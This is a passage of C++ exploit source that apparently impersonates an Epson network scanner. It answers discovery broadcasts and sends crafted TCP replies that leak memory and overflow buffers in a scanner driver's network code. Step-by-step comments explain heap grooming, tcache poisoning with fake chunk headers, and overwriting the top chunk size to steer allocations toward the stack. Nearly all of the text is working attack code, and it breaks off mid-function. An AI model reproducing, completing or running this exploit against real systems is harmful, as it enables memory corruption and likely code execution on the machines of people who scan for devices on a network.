#include <string.h>
#include <assert.h>
#include <arpa/inet.h>
#include <map>
#include "utils.hpp"
#include <stdio.h>
#include <stdlib.h>
#include <errno.h>

// This number is the buffer size that we use in the "large_mmap" stage.
// The exact value doesn't matter too much: it just needs to be more than
// the amount of memory that we are going to use during the rest of
// the exploit, so that we don't accidentally hit invalid memory when
// we allocate from the top chunk.
static const uint32_t large_mmap_size = 0x1ffd0;

// Keep track of the set of client ip addresses that have sent us
// an Epson discover message. This is so that we can count the
// number of times that we have accepted a TCP connection from
// each client so far. (The exploit involves tricking the client
// into connecting to us multiple times.) We reset the counter
// when we receive a new discover message.
class EpsonClientSet {
  // The key of the std::map is the IP address of the client.
  class Key {
    in_addr peer_addr_;

  public:
    Key(const sockaddr* peer_addr, socklen_t peer_addr_len) {
      assert(peer_addr_len >= sizeof(sockaddr_in));
      peer_addr_ = ((const sockaddr_in*)peer_addr)->sin_addr;
      printf("Key: %s", inet_ntoa(peer_addr_));
    }

    bool operator<(const Key& that) const {
      return memcmp(&peer_addr_, &that.peer_addr_, sizeof(in_addr)) < 0;
    }
  };

  std::map<Key, size_t> counts_;

public:
  void resetClient(const sockaddr* peer_addr, socklen_t peer_addr_len) {
    printf("resetClient ");
    if (peer_addr_len < sizeof(sockaddr_in)) {
      return;
    }
    counts_[Key(peer_addr, peer_addr_len)] = 0;
    printf("\n");
  }

  size_t incrClient(const sockaddr* peer_addr, socklen_t peer_addr_len) {
    printf("incrClient ");
    auto i = counts_.find(Key(peer_addr, peer_addr_len));
    if (i != counts_.end()) {
      size_t n = (i->second)++;
      printf(" count: %lu\n", n);
      return n;
    }
    printf("incrClient key not found: ");
    counts_[Key(peer_addr, peer_addr_len)] = 1;
    printf("\n");
    return 0;
  }
};

static const char epsonp_discover[15] = "EPSONP\x00\xff\x00\x00\x00\x00\x00\x00";

static const char epsonp_response[76] =
  "EPSON                                                                      ";

class EpsonHandlerUDP : public RecvHandlerUDP {
  EpsonClientSet& epsonClientSet_;

public:
  EpsonHandlerUDP(EpsonClientSet& epsonClientSet) :
    epsonClientSet_(epsonClientSet)
  {}

  virtual ~EpsonHandlerUDP() {}

  int receive(
    const uint8_t* buf, ssize_t len,
    SocketHandlerUDP& sock,
    const sockaddr* peer_addr, socklen_t peer_addr_len
  ) override {
    print_addr(peer_addr, peer_addr_len);
    printf("\n");
    if (len != sizeof(epsonp_discover)) {
      // We're not interested in this message.
      return 0;
    }
    if (memcmp(buf, epsonp_discover, sizeof(epsonp_discover)) != 0) {
      // We're not interested in this message.
      return 0;
    }

    // This is the first contact from this client, so reset/create
    // its counter.
    epsonClientSet_.resetClient(peer_addr, peer_addr_len);

    printf("EPSON discover\n");
    for (size_t i = 0; i < 128; i++) {
      if (sock.replyto(
            epsonp_response, sizeof(epsonp_response),
            peer_addr,
            peer_addr_len
          ) < 0) {
        printf("failed to send response.\n");
      }
    }

    return 0;
  }
};

class EpsonHandlerTCP : public RecvHandlerTCP {
public:
  enum AcceptState : size_t {
    A_groom_heap = 0,
    A_create_tcache_blocks = 64,
    A_reindex_tcache_blocks,
    A_overwrite_tcache_blocks,
    A_create_extra_tcache_block00,
    A_large_mmap = A_create_extra_tcache_block00 + 15,
    A_create_barrier1,
    A_resize_buffer1,
    A_overwrite_top,
    A_subtract_top,
    A_copy_pointer
  };

private:
  enum HdrState {
    H_wait_hdr, // Waiting for the 12 byte header
    H_wait_extra_hdr, // Waiting for the extra 8 header bytes
    H_wait_payload, // Waiting for the message payload
    H_wait_moreinfo, // Waiting for the request for more info
    H_wait_stackdump // Waiting for the stack dump after triggering the info leak.
  };

  // What to do when we receive the H_wait_moreinfo message.
  enum MoreinfoState {
    // Respond with a message which causes memory to be leaked.
    M_leakmem,

    // Allocate some tcache-sized blocks from the top chunk,
    // then free them, so that they go in the tcache.
    M_create_tcache_blocks,
    M_reindex_tcache_blocks,
    M_overwrite_tcache_blocks,
    M_create_extra_tcache_block,
    M_reindex_extra_tcache_block,
    M_resize_extra_tcache_block,

    // Respond with a message which causes a large amount of memory to
    // be allocated and then freed, thereby mmap-ing more memory.
    M_large_mmap,

    // Respond with a message which causes decode_before to leak
    // some memory. We use this to split the heap, because pbuf (epsonds-cmd.c:187)
    // is allocated at a lower address and is subsequently freed, leaving a gap
    // in the heap.
    M_create_barrier,

    // We use a buffer overflow to enlarge the PRD buffer before it is freed.
    M_resize_buffer,

    // We allocate a PRD buffer. Due to previous heap massage, this will
    // overwrite the size of the top chunk.
    M_overwrite_top,

    M_subtract_top,

    M_copy_pointer,

    // Leak a 64 byte allocation.
    M_leakmem64,
    M_leakmem64_nrdBUSY
  };

  // The number of times that we have accepted a TCP connection
  // from this client. (The exploit involves tricking the client
  // into connecting to us multiple times.)
  const size_t acceptCount_;

  // Only used when acceptCount_ == A_copy_pointer. We need to go round
  // the in esci2_info a few times to leak all the 64 byte blocks in the
  // tcache. This counter keeps track of the number of loop iterations.
  size_t copy_pointer_info_count_;

  HdrState state_;
  MoreinfoState moreinfo_state_;
  uint16_t cmd_;
  uint32_t buf_size_;
  uint32_t reply_len_;

  ssize_t send_ack(SocketHandlerTCP& sock) {
    const char reply[13] = {'I', 'S', 0, 0, 0, 12, 0, 0, 0, 1, 0, 0, 6};
    if (sock.reply(reply, sizeof(reply)) < 0) {
      printf("send failed.\n");
    }

    state_ = H_wait_hdr;
    return 12;
  }

  void send_leakmem(SocketHandlerTCP& sock) {
    // Trigger the `wanted > size` case (epsonds-net.c:149), which leaks
    // the reply buffer because we sent a shorter reply than expected.
    char reply[76] =
      {'I', 'S', 0, 0, 0, 12, 0, 0, 0, 64, 0, 0,
       'I','N','F','O','x',0,0,0,0,0,0,0,0,0,0,0,
       0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
       0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
       0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
      };
    // The VER command triggers a 0xf8 byte malloc/free pair.  We do this
    // to reserve some space for the next allocation of `struct
    // epsonds_device` at epsonds.c:349. Otherwise that allocation could
    // split the block that was previously used for `struct
    // epsonds_scanner` (epsonds.c:303) which would ruin our heap grooming
    // strategy.
    sprintf(&reply[17], "#VERh0f7kevwozere#---");
    if (sock.reply(reply, sizeof(reply)) < 0) {
      printf("send failed.\n");
    }
  }

  void send_create_tcache_blocks(SocketHandlerTCP& sock) {
    printf("send_create_tcache_blocks %x\n", reply_len_);
    char reply[12] = {'I', 'S', 0, 0, 0, 12, 0, 0, 0, 1, 0, 0};
    *(uint32_t*)&reply[6] = htonl(reply_len_);
    if (sock.reply(reply, sizeof(reply)) < 0) {
      printf("send failed.\n");
    }

    // Send the requested amount of data.
    // Include two VER commands, each of which will allocate some
    // memory from the top chunk and then return it to the tcache.
    char buf[0xa30];
    memset(buf, 0, sizeof(buf));
    sprintf(buf, "#VERh3cfkevwozere#VERh3dfkevwozere#---");

    const ssize_t wr = sock.reply(buf, sizeof(buf));
    if (wr < 0) {
      const int err = errno;
      printf("send failed: %s\n", strerror(err));
    } else {
      printf("total sent: %ld bytes\n", wr);
    }
  }

  void send_reindex_tcache_blocks(SocketHandlerTCP& sock) {
    printf("send_reindex_tcache_blocks %x\n", reply_len_);
    const uint32_t overflow_len = 0x510 + 0x400 + 0x30;
    char reply[12] = {'I', 'S', 0, 0, 0, 12, 0, 0, 0, 1, 0, 0};
    *(uint32_t*)&reply[6] = htonl(overflow_len);
    if (sock.reply(reply, sizeof(reply)) < 0) {
      printf("send failed.\n");
    }

    // The reply includes a VER command so that the first tcache
    // block will get allocated and freed. We use the buffer
    // overflow to change its size, so that it will be returned to
    // a different tcache index.
    char buf[overflow_len];
    memset(buf, 0, sizeof(buf));
    sprintf(buf,"#VERh3cfkevwozere#---");
    *(uint64_t*)&buf[0x510] = 0x520; // Preserve what was there before.
    *(uint64_t*)&buf[0x510 + 0x8] = 0x405; // New size (was 0x3e5)
    *(uint64_t*)&buf[0x510 + 0x3e0] = 0; // Preserve what was there before.
    *(uint64_t*)&buf[0x510 + 0x3e8] = 0x3f5; // Preserve what was there before.
    *(uint64_t*)&buf[0x510 + 0x400] = 0; // Terminate new block
    *(uint64_t*)&buf[0x510 + 0x408] = 0x25; // Fake next chunk
    *(uint64_t*)&buf[0x510 + 0x400 + 0x20] = 0x20; // Fake next chunk
    *(uint64_t*)&buf[0x510 + 0x400 + 0x28] = 0x25; // Fake next chunk

    const ssize_t wr = sock.reply(buf, sizeof(buf));
    if (wr < 0) {
      const int err = errno;
      printf("send failed: %s\n", strerror(err));
    } else {
      printf("total sent: %ld bytes\n", wr);
    }
  }

  void send_overwrite_tcache_blocks(SocketHandlerTCP& sock) {
    printf("send_overwrite_tcache_blocks %x\n", reply_len_);
    const uint32_t overflow_len = 0x510 + 0x3e0 + 0x80;
    char reply[12] = {'I', 'S', 0, 0, 0, 12, 0, 0, 0, 1, 0, 0};
    *(uint32_t*)&reply[6] = htonl(overflow_len);
    if (sock.reply(reply, sizeof(reply)) < 0) {
      printf("send failed.\n");
    }

    // The two tcache blocks are now stored at their desired tcache
    // indices. We're now going to overwrite them so that they look like
    // they are 0x40 byte allocations. Later, we will be able to allocate
    // them based on their old size, but they'll be returned as 0x40 byte
    // allocations.
    char buf[overflow_len];
    memset(buf, 0, sizeof(buf));
    sprintf(buf, "#---");
    *(uint64_t*)&buf[0x510] = 0x520; // Preserve what was there before.
    *(uint64_t*)&buf[0x510 + 0x8] = 0x55; // New size (was 0x405)
    *(uint64_t*)&buf[0x510 + 0x50] = 0x50; // New size
    *(uint64_t*)&buf[0x510 + 0x58] = 0x25; // Fake chunk
    *(uint64_t*)&buf[0x510 + 0x70] = 0x20; // Fake chunk
    *(uint64_t*)&buf[0x510 + 0x78] = 0x25; // Fake chunk
    *(uint64_t*)&buf[0x510 + 0x3e0] = 0; // Preserve what was there before.
    *(uint64_t*)&buf[0x510 + 0x3e8] = 0x55; // New size (was 0x3f5)
    *(uint64_t*)&buf[0x510 + 0x3e0 + 0x50] = 0x50; // New size
    *(uint64_t*)&buf[0x510 + 0x3e0 + 0x58] = 0x25; // Fake chunk
    *(uint64_t*)&buf[0x510 + 0x3e0 + 0x70] = 0x20; // Fake chunk
    *(uint64_t*)&buf[0x510 + 0x3e0 + 0x78] = 0x25; // Fake chunk

    const ssize_t wr = sock.reply(buf, sizeof(buf));
    if (wr < 0) {
      const int err = errno;
      printf("send failed: %s\n", strerror(err));
    } else {
      printf("total sent: %ld bytes\n", wr);
    }
  }

  void send_create_extra_tcache_block(SocketHandlerTCP& sock) {
    printf("send_create_extra_tcache_block %x\n", reply_len_);
    char reply[12] = {'I', 'S', 0, 0, 0, 12, 0, 0, 0, 1, 0, 0};
    *(uint32_t*)&reply[6] = htonl(reply_len_);
    if (sock.reply(reply, sizeof(reply)) < 0) {
      printf("send failed.\n");
    }

    // Allocate and free 0x400 bytes. It will go in the tcache.
    char buf[0xa30];
    memset(buf, 0, sizeof(buf));
    sprintf(buf, "#VERh3ff#---");
    // Prepare the end of the chunk so that we can resize it to 0x3e0 on
    // the next iteration.
    *(uint64_t*)&buf[8 + 0x3d0] = 0x3e0;
    *(uint64_t*)&buf[8 + 0x3d8] = 0x35; // Fake chunk (covering gap to top chunk)

    const ssize_t wr = sock.reply(buf, sizeof(buf));
    if (wr < 0) {
      const int err = errno;
      printf("send failed: %s\n", strerror(err));
    } else {
      printf("total sent: %ld bytes\n", wr);
    }
  }

  void send_reindex_extra_tcache_block(SocketHandlerTCP& sock) {
    printf("send_reindex_extra_tcache_block %x\n", reply_len_);
    const uint32_t overflow_len = 0x510 + 0x10;
    char reply[12] = {'I', 'S', 0, 0, 0, 12, 0, 0, 0, 1, 0, 0};
    *(uint32_t*)&reply[6] = htonl(overflow_len);
    if (sock.reply(reply, sizeof(reply)) < 0) {
      printf("send failed.\n");
    }

    // Allocate and free the chunk that we created during the previous
    // iteration. We have used the buffer overflow to modify its header
    // so that it now looks like a chunk of size 0x3e0. So it will be
    // returned to a different tcache index.
    char buf[overflow_len];
    memset(buf, 0, sizeof(buf));
    sprintf(buf, "#VERh3ff#---");
    // Prepare the end of the chunk so that we can resize it to 0x50 on
    // the next iteration.
    *(uint64_t*)&buf[8 + 0x40] = 0x50;
    *(uint64_t*)&buf[8 + 0x48] = 0x25; // Fake chunk
    *(uint64_t*)&buf[8 + 0x60] = 0x20; // Fake chunk
    *(uint64_t*)&buf[8 + 0x68] = 0x25; // Fake chunk

    // Use buffer overflow to change the size of the buffer.
    *(uint64_t*)&buf[0x510] = 0x520; // Preserve what was there before.
    *(uint64_t*)&buf[0x510 + 0x8] = 0x3e5; // New size (was 0x415)

    const ssize_t wr = sock.reply(buf, sizeof(buf));
    if (wr < 0) {
      const int err = errno;
      printf("send failed: %s\n", strerror(err));
    } else {
      printf("total sent: %ld bytes\n", wr);
    }
  }

  void send_resize_extra_tcache_block(SocketHandlerTCP& sock) {
    printf("send_reindex_extra_tcache_block %x\n", reply_len_);
    const uint32_t overflow_len = 0x510 + 0x10;
    char reply[12] = {'I', 'S', 0, 0, 0, 12, 0, 0, 0, 1, 0, 0};
    *(uint32_t*)&reply[6] = htonl(overflow_len);
    if (sock.reply(reply, sizeof(reply)) < 0) {
      printf("send failed.\n");
    }

    // Overwrite the header of the chunk so that its size is 0x50.
    // It is currently stored in the tcache for chunks of size 0x3e0,
    // so it will sit there happily until we are ready to use it
    // later in the exploit. At that time, we will be able to use
    // the VERh3cf command to allocate and free the chunk, and it
    // will be returned as a chunk of size 0x50.
    char buf[overflow_len];
    memset(buf, 0, sizeof(buf));
    sprintf(buf, "#---");
    // Use buffer overflow to change the size of the buffer.
    *(uint64_t*)&buf[0x510] = 0x520; // Preserve what was there before.
    *(uint64_t*)&buf[0x510 + 0x8] = 0x55; // New size (was 0x3e5)

    const ssize_t wr = sock.reply(buf, sizeof(buf));
    if (wr < 0) {
      const int err = errno;
      printf("send failed: %s\n", strerror(err));
    } else {
      printf("total sent: %ld bytes\n", wr);
    }
  }

  void send_mmap(SocketHandlerTCP& sock) {
    printf("send_mmap %x\n", reply_len_);
    char reply[12] = {'I', 'S', 0, 0, 0, 12, 0, 0, 0, 1, 0, 0};
    *(uint32_t*)&reply[6] = htonl(reply_len_);
    if (sock.reply(reply, sizeof(reply)) < 0) {
      printf("send failed.\n");
    }

    char buf[large_mmap_size];
    memset(buf, 0, sizeof(buf));
    sock.reply(buf, sizeof(buf));
  }

  void send_create_barrier(SocketHandlerTCP& sock) {
    printf("send_create_barrier %x\n", reply_len_);
    char reply[12] = {'I', 'S', 0, 0, 0, 12, 0, 0, 0, 1, 0, 0};
    *(uint32_t*)&reply[6] = htonl(reply_len_);
    if (sock.reply(reply, sizeof(reply)) < 0) {
      printf("send failed.\n");
    }

    // Send the requested amount of data.
    // Include a PRD instruction which tells decode_buffer to
    // allocated 0x510 bytes.
    char buf[0xa30];
    memset(buf, 0, sizeof(buf));
    sprintf(buf, "#PRDh50fkevwozere#---");

    const ssize_t wr = sock.reply(buf, sizeof(buf));
    if (wr < 0) {
      const int err = errno;
      printf("send failed: %s\n", strerror(err));
    } else {
      printf("total sent: %ld bytes\n", wr);
    }
  }

  void send_resize_buffer(SocketHandlerTCP& sock) {
    printf("send_resize_buffer %x\n", reply_len_);
    const uint32_t overflow_len = 0x510 + 0x520 + 0x1440 + 0x30;
    char reply[12] = {'I', 'S', 0, 0, 0, 12, 0, 0, 0, 1, 0, 0};
    *(uint32_t*)&reply[6] = htonl(overflow_len);
    if (sock.reply(reply, sizeof(reply)) < 0) {
      printf("send failed.\n");
    }

    // Send more data than requested. We're going to overwrite
    // the PRD buffer to make it look bigger. We also include
    // a new PRD instruction in the response which will allocate
    // a smaller buffer in the bottom half of the new large block.
    // That PRD allocation is leaked which means that we now have
    // a free buffer that overlaps with the top chunk.
    char buf[overflow_len];
    memset(buf, 0, sizeof(buf));
    sprintf(buf, "#PRDh9dfkevwozere#---");
    // Expected reply buffer is 0x510 bytes.
    // Barrier is 0x510 bytes.
    // Old PRD buffer is 0xa60 bytes
    // New PRD size is 0x1430 bytes
    *(uint64_t*)&buf[0x510] = 0x520; // Preserve what was there before.
    *(uint64_t*)&buf[0x510 + 0x8] = 0x525; // Preserve what was there before.
    *(uint64_t*)&buf[0x510 + 0x520] = 0; // Preserve what was there before.
    *(uint64_t*)&buf[0x510 + 0x520 + 0x8] = 0x1445; // New size (was 0xa55)
    *(uint64_t*)&buf[0x510 + 0x520 + 0xa70 + 0x8] = 0x10001; // Overwrite top chunk size
    *(uint64_t*)&buf[0x510 + 0x520 + 0x1440] = 0x1440; // New size
    *(uint64_t*)&buf[0x510 + 0x520 + 0x1440 + 0x8] = 0x25; // Fake next chunk
    *(uint64_t*)&buf[0x510 + 0x520 + 0x1440 + 0x20] = 0x20; // Fake next chunk
    *(uint64_t*)&buf[0x510 + 0x520 + 0x1440 + 0x28] = 0x25; // Fake next chunk

    const ssize_t wr = sock.reply(buf, sizeof(buf));
    if (wr < 0) {
      const int err = errno;
      printf("send failed: %s\n", strerror(err));
    } else {
      printf("total sent: %ld bytes\n", wr);
    }
  }

  void send_overwrite_top(SocketHandlerTCP& sock) {
    printf("send_overwrite_top %x\n", reply_len_);
    const uint32_t overflow_len = 0x510 + 0x520 + 0xa70 + 0x8 + 0x1;
    char reply[12] = {'I', 'S', 0, 0, 0, 12, 0, 0, 0, 1, 0, 0};
    *(uint32_t*)&reply[6] = htonl(overflow_len);
    if (sock.reply(reply, sizeof(reply)) < 0) {
      printf("send failed.\n");
    }

    // Send more data than requested. We're going to overwrite the bottom
    // byte of the size of the top chunk with 0x1 to make it valid, so that
    // we can start allocating memory from the top chunk. We also include a
    // new PRD instruction in the response to leak one of the 0x510 blocks
    // before the barrier, because we don't need it anymore.
    char buf[overflow_len];
    memset(buf, 0, sizeof(buf));
    sprintf(buf, "#PRDh50fkevwozere#---");
    // Expected reply buffer is 0x510 bytes.
    // Barrier is 0x510 bytes.
    // Old PRD buffer is 0xa60 bytes
    // New PRD size is 0x1430 bytes
    *(uint64_t*)&buf[0x510] = 0x520; // Preserve what was there before.
    *(uint64_t*)&buf[0x510 + 0x8] = 0x525; // Preserve what was there before.
    *(uint64_t*)&buf[0x510 + 0x520] = 0; // Preserve what was there before.
    *(uint64_t*)&buf[0x510 + 0x520 + 0x8] = 0x9f5; // Preserve what was there before.

    // Overwrite the old PRD block so that it looks like a 64 byte allocation.
    // This will be freed and added to the tcache. We need the tcache to be
    // fully loaded for the the rest of the exploit to work. It's probably already
    // full but this is a convenient opportunity to free another chunk so we might
    // as well take it.
    *(uint64_t*)&buf[0x510 + 0x520 + 0x9f0] = 0; // Preserve what was there before.
    *(uint64_t*)&buf[0x510 + 0x520 + 0x9f0 + 0x8] = 0x55; // 64 byte chunk
    *(uint64_t*)&buf[0x510 + 0x520 + 0x9f0 + 0x50] = 0x50; // New size
    *(uint64_t*)&buf[0x510 + 0x520 + 0x9f0 + 0x58] = 0x25; // Fake next chunk
    *(uint64_t*)&buf[0x510 + 0x520 + 0x9f0 + 0x70] = 0x20; // Fake next chunk
    *(uint64_t*)&buf[0x510 + 0x520 + 0x9f0 + 0x78] = 0x25; // Fake next chunk

    buf[0x510 + 0x520 + 0xa70 + 0x8] = 0x1; // Overwrite bottom byte of top chunk size.

    const ssize_t wr = sock.reply(buf, sizeof(buf));
    if (wr < 0) {
      const int err = errno;
      printf("send failed: %s\n", strerror(err));
    } else {
      printf("total sent: %ld bytes\n", wr);
    }
  }

  void send_subtract_top(SocketHandlerTCP& sock) {
    // Trigger the `wanted > size` case (epsonds-net.c:149), which leaks
    // the reply buffer because we sent a shorter reply than expected.
    char reply[76] =
      {'I', 'S', 0, 0, 0, 12, 0, 0, 0, 64, 0, 0,
       'I','N','F','O','x',0,0,0,0,0,0,0,0,0,0,0,
       0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
       0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
       0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
      };

    // We have previously overwritten the size of the top chunk with a
    // stack address. Now we are subtracting an offset from that stack
    // address by allocating a large block of memory. We will leak the
    // reply buffer so that the top chunk stays at the position that we
    // just moved it to. (Also because the reply buffer is freed then the
    // malloc implementation will notice that the size of the top chunk is
    // invalid and crash.)
    //
    // We include a VER command to allocate 0x400 bytes. There are currently
    // no gaps in memory, so this will be allocated immediately after the
    // reply buffer. But when we free it, it will be added to the tcache.
    sprintf(&reply[17], "#VERh3ffkevwozere#---");
    if (sock.reply(reply, sizeof(reply)) < 0) {
      printf("send failed.\n");
    }
  }

  void send_copy_pointer(SocketHandlerTCP& sock) {
    printf("send_copy_pointer %x\n", reply_len_);
    const uint32_t len = 0x400;
    char header[12] = {'I', 'S', 0, 0, 0, 12, 0, 0, 0, 1, 0, 0};
    *(uint32_t*)&header[6] = htonl(len);
    char buf[sizeof(header) + len];
    memset(buf, 0, sizeof(buf));
    memcpy(buf, header, sizeof(header));

    sprintf(
      &buf[sizeof(header)],
      "#VERh3df#AAAAAAAAAAAAAAAAAAAAAAAA#VERh3ef#AAA"
    );
    *(uint64_t*)&buf[sizeof(header) + 8 + 0x40] = 0x50;
    *(uint64_t*)&buf[sizeof(header) + 8 + 0x48] = 0x25;
    *(uint64_t*)&buf[sizeof(header) + 8 + 0x60] = 0x20;
    *(uint64_t*)&buf[sizeof(header) + 8 + 0x68] = 0x25;
    *(uint64_t*)&buf[sizeof(header) + 41 + 0x40] = 0x50;
    *(uint64_t*)&buf[sizeof(header) + 41 + 0x48] = 0x25;
    *(uint64_t*)&buf[sizeof(header) + 41 + 0x60] = 0x20;
    *(uint64_t*)&buf[sizeof(header) + 41 + 0x68] = 0x25;

    // Add "nrdBUSY" so that we repeat the loop in esci2_info.
    sprintf(
      &buf[sizeof(header) + 41 + 0x70],
      "#nrdBUSY"
    );

    for (size_t i = 0; i < 5; i++) {
      const size_t offset = sizeof(header) + 41 + 0x78 + i * 0x78;
      sprintf(&buf[offset], "#VERh3cf");
      *(uint64_t*)&buf[offset + 8 + 0x40] = 0x50;
      *(uint64_t*)&buf[offset + 8 + 0x48] = 0x25;
      *(uint64_t*)&buf[offset + 8 + 0x60] = 0x20;
      *(uint64_t*)&buf[offset + 8 + 0x68] = 0x25;
    }

    sprintf(
      &buf[sizeof(header) + 41 + 0x78 + 5 * 0x78],
      "#PRDh03f#---"
    );

    const ssize_t wr = sock.reply(buf, sizeof(buf));
    if (wr < 0) {
      const int err = errno;
      printf("send failed: %s\n", strerror(err));
    } else {
      printf("total sent: %ld bytes\n", wr);
    }
  }

  void send_leakmem64_nrdBUSY(SocketHandlerTCP& sock) {
    // Trigger the `wanted > size` case (epsonds-net.c:149), which leaks
    // the reply buffer because we sent a shorter reply than expected.
    char reply[75] =
      {'I', 'S', 0, 0, 0, 12, 0, 0, 0, 63, 0, 0,
       'I','N','F','O','x',0,0,0,0,0,0,0,0,0,0,0,
       0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
       0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
       0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
      };
    sprintf(&reply[17], "#nrdBUSY#---");
    if (sock.reply(reply, sizeof(reply)) < 0) {
      printf("send failed.\n");
    }
  }

  void send_leakmem64(SocketHandlerTCP& sock) {
    // Trigger the `wanted > size` case (epsonds-net.c:149), which leaks
    // the reply buffer because we sent a shorter reply than expected.
    char reply[75] =
      {'I', 'S', 0, 0, 0, 12, 0, 0, 0, 63, 0, 0,
       'I','N','F','O','x',0,0,0,0,0,0,0,0,0,0,0,
       0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
       0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
       0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
      };
    sprintf(&reply[17], "#---");
    if (sock.reply(reply, sizeof(reply)) < 0) {
      printf("send failed.\n");
    }
  }

  ssize_t eds_send(SocketHandlerTCP& sock, const uint8_t* buf) {
    if (buf_size_ == 2 && memcmp(buf, "\x1CX", 2) == 0 && reply_len_ == 1) {
      return send_ack(sock);
    } else if (buf_size_ == 12 && memcmp(buf, "INFOx0000000", 12) == 0 && reply_len_ == 64) {
      if (acceptCount_ < A_create_tcache_blocks) {
        printf("A_groom_heap %lu\n", acceptCount_);
        // On the first few iterations, we want to groom the heap by leaking quite
        // a bit of memory. There are three goals:
        //
        // 1. Fill any large gaps so that any subsequent large allocations will
        //    come from the top chunk.
        // 2. Leave plenty of smaller gaps to absorb smaller memory
        //    leaks. In particular, the code is going to leak an object of
        //    type `struct epsonds_device` (size 0xf8 bytes) on every
        //    iteration. Several small strings are also leaked on every
        //    iteration.
        // 3. Empty the tcache for allocations of size 0x3d0, 0x3e0, 0x3f0,
        //    and 0x400. That's because we want to allocate blocks of those
        //    sizes from the top chunk and then store them in the tcache to
        //    use later. If the tcache isn't empty then they won't get allocated
        //    from the top chunk and everything will go wrong.
        //
        // We accomplish these goals by repeatedly leaking a PRD allocation
        // of size 0x3d0/0x3e0/0x3f0/0x400 and a reply buffer of size
        // 0x830. Once we have finished filling any existing gaps, this
        // will settle into a pattern where the leaked reply buffer from
        // the previous iteration gets split to service the PRD allocation,
        // leaving a gap of size 0x400. The end result is that the tcache
        // is full and there are plenty of extra blocks of size 0x400
        // available to service the smaller allocations.
        char reply[76] =
          {'I', 'S', 0, 0, 0, 12, 0, 0, 0, 64, 0, 0,
           'I','N','F','O','x',0,0,0,0,0,0,0,0,0,0,0,
           0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
           0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
           0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
          };

        // Just too small to accomodate two blocks of size 0x3d0, so that
        // when it gets split, it doesn't leave a gap that can be reused
        // for an allocation of size 0x3d0.
        const uint32_t more = 0x7a0;
        // Use a PRD to leak an allocation of size 0x3d0/0x3e0/0x3f0/0x400.
        const size_t prdsize = 0x3d0 + 0x10 * (acceptCount_ % 4) - 1;
        sprintf(
          &reply[17], "%07x#iter%lu#PRDh%lxkevwozere#---",
          more, acceptCount_, prdsize
        );
        if (sock.reply(reply, sizeof(reply)) < 0) {
          printf("send failed.\n");
        }
        state_ = H_wait_moreinfo;
        moreinfo_state_ = M_leakmem;
        return 20;
      } else if (acceptCount_ == A_create_tcache_blocks) {
        printf("A_create_tcache_blocks %lu\n", acceptCount_);
        char reply[76] =
          {'I', 'S', 0, 0, 0, 12, 0, 0, 0, 64, 0, 0,
           'I','N','F','O','x',0,0,0,0,0,0,0,0,0,0,0,
           0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
           0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
           0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
          };

        // Allocate 0xa30 bytes into `pbuf`. We will allocate some tcache
        // sized blocks above it in memory. Those blocks will not be returned
        // to the top chunk when they are freed because they will go into
        // the tcache instead. On the next iteration, we will use more = 0x510
        // so that both pbuf and the reply buffer fit before the tcache blocks
        // so that we can use the buffer overflow to overwrite them.
        const uint32_t more = 0xa30;
        // Use a PRD to plug split the pbuf from the previous iteration.
        sprintf(&reply[17], "%07x#iter%lu#PRDh3ff#---", more, acceptCount_);
        if (sock.reply(reply, sizeof(reply)) < 0) {
          printf("send failed.\n");
        }
        state_ = H_wait_moreinfo;
        moreinfo_state_ = M_create_tcache_blocks;
        return 20;
      } else if (acceptCount_ == A_reindex_tcache_blocks) {
        printf("A_reindex_tcache_blocks %lu\n", acceptCount_);
        char reply[76] =
          {'I', 'S', 0, 0, 0, 12, 0, 0, 0, 64, 0, 0,
           'I','N','F','O','x',0,0,0,0,0,0,0,0,0,0,0,
           0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
           0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
           0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
          };

        // Overwrite one of the tcache blocks which we created in the
        // previous iteration. We make it bigger so that it overlaps with
        // the other one.
        const uint32_t more = 0x510;
        sprintf(&reply[17], "%07x#iter%lu#---", more, acceptCount_);
        if (sock.reply(reply, sizeof(reply)) < 0) {
          printf("send failed.\n");
        }
        state_ = H_wait_moreinfo;
        moreinfo_state_ = M_reindex_tcache_blocks;
        return 20;
      } else if (acceptCount_ == A_overwrite_tcache_blocks) {
        printf("A_overwrite_tcache_blocks %lu\n", acceptCount_);
        char reply[76] =
          {'I', 'S', 0, 0, 0, 12, 0, 0, 0, 64, 0, 0,
           'I','N','F','O','x',0,0,0,0,0,0,0,0,0,0,0,
           0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
           0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
           0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
          };

        const uint32_t more = 0x510;
        sprintf(&reply[17], "%07x#iter%lu#---", more, acceptCount_);
        if (sock.reply(reply, sizeof(reply)) < 0) {
          printf("send failed.\n");
        }
        state_ = H_wait_moreinfo;
        moreinfo_state_ = M_overwrite_tcache_blocks;
        return 20;
      } else if (A_create_extra_tcache_block00 <= acceptCount_ &&
                 acceptCount_ < A_large_mmap) {
        // We need to create 5 additional tcache blocks. This takes two
        // iterations per additional tcache block. On the even iterations,
        // we allocate and free 0x400 bytes. On the odd iterations, we use
        // the buffer overflow to change the size of the chunk to 0x4d0 and
        // then allocate and free it, so that it gets moved to the tcache
        // index for 0x4d0.
        const size_t i = acceptCount_ - A_create_extra_tcache_block00;
        printf("A_overwrite_tcache_blocks%.2lu %lu\n", i, acceptCount_);
        if (i % 3 == 0) {
          char reply[76] =
